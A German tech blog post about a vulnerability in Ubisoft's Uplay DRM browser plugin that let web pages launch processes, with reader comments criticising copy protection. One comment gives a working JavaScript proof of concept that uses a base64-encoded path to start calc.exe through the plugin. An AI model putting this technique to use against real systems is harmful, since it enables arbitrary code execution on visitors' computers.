Ubisoft: Kopierschutz wird zur Backdoor, Mozilla blockt

Ubisoft kennt ihr? Anno 2070, Assassin’s Creed, Heroes of Might and Magic VI, Die Siedler 7, Tom Clancy und Co. Der Spiele Publisher ist nun allerdings nicht wegen eines neuen Spiels in den Medien, sondern weil das von Ubisoft eingesetzte DRM-System (Steam für Arme) namens Uplay ein Browser-Plugin mitbringt, der euren Rechner angreifbar macht. So könnten Angreifer mit speziell präparierten Seiten beliebige Prozesse auf eurem Rechner starten (die verlinkte Seite öffnet den Windows Taschenrechner, sofern euer System von der Problematik betroffen ist).

Wäre eigentlich gar kein großes Thema für mich, aber ich kann hier einmal auf eine interessante Seite von Mozilla hinweisen. Diese können nämlich auch Erweiterungen direkt blocken – das heißt, dass sich auf der Sperrliste befindliche Erweiterungen auch dann deaktivieren lassen, wenn diese bereits installiert und aktiv sind. Wie das funktioniert, könnt ihr hier nachlesen. Kopierschutz ist ja für einige Hersteller ja schön und gut – aber das auf Kosten meiner PC-Sicherheit? Laut Knut hat Ubisoft mittlerweile reagiert und ein Update eingespielt.(via)

Gefällt dir der Artikel? Dann teile ihn mit deinen Freunden.

Hallo, ich bin Carsten! Baujahr 1977, Dortmunder im Norden, BVB-Getaufter und Gründer dieses Blogs. Auch zu finden bei Twitter, Google+, Facebook, Instagram und YouTube. PayPal-Kaffeespende. Mail: carsten@caschys.blog

4 Kommentare

  1. Seit der Kampf zwischen den Publishern und den Crack-Gruppen immer erbitterter geführt wird, sind es nicht die Raubkopierer, die das Nachsehen haben, sondern die ehrlichen Käufer.

    Ich habe schon allzu oft gelesen, dass Käufer ein Spiel nicht spielen konnten, weil der Kopierschutz rumgezickt hat. Und die Leute, die sich das Spiel illegal besorgt haben, lachen sich eins ins Fäustchen, weil die Crack-Gruppen den gesamten Kopierschutz ausgehebelt haben.

    Da dürfen sich die Publisher nicht wundern, dass ihre Spiele millionenfach illegal im Internet runtergeladen werden und der Kopierschutz NICHTS daran ändert. Die sollten lieber mal mehr Aufwand in die Qualitätssicherung stecken…

  2. Krass.

    var x = document.createElement(‚OBJECT‘);
    x.setAttribute(„type“, „application/x-uplaypc“);
    document.body.appendChild(x);
    x.open(„-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play“)

    Und schon startet der Calculator. ‚QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==‘ ist ein Base64 Kodierter String Pfad zum Rechner.

    So eine Sicherheitslücke hab ich selbst mit 14 nich hinbekommen. Machen die sich keine Gedanken?!

  3. Natürlich habe ich auch früher am PC gezockt, mittlerweile mache ich das fast ausschliesslich an der Konsole weil ich einfach kein Bock drauf hab das Spiel zu installieren, um dann mein Sytem auch noch mit irgendwelchen „Nach-Hause-Telefonier-Origin-Clients“ und „Du-musst online-sein-um-das-Spiel-spielen-zu-können“ vollzumüllen.

    Ich kann die Hersteller natürlich in gewisser Weise verstehen, dass Sie versuchen Ihre Produkte zu schützen aber es sollte den Nutzer nicht zu sehr einschränken, sonst geht das Spielerlebnis verloren.

    Ich weiss, dass einige Spiele natürlich für die Steuerung mit der Tastutur und Maus konzipiert sind aber auch da lässt sich mit ein bisschen Willen ggf. eine gute Controller- bzw. Konsolenportierung realisieren. Und sollte das nicht der Fall sein, dann muss man halt darauf verzichten.

    Ich für meinen Teil fläz mich lieber auffer Couch und zock am TV, ist einfach entspannter…und sicherheitslückenunkritischer! 🙂

  4. Ich verzichte auch auf den Kauf von Die Siedler 7, solange Ubisoft seinen Ubi-Launcher da drin hat. Das Spiel interessiert mich schon von Anfang an, aber so nicht! Traurig nur, dass sie ihren Kopierschutz nicht mal nach Jahren in den Gold oder sonstwas Editionen herausnehmen.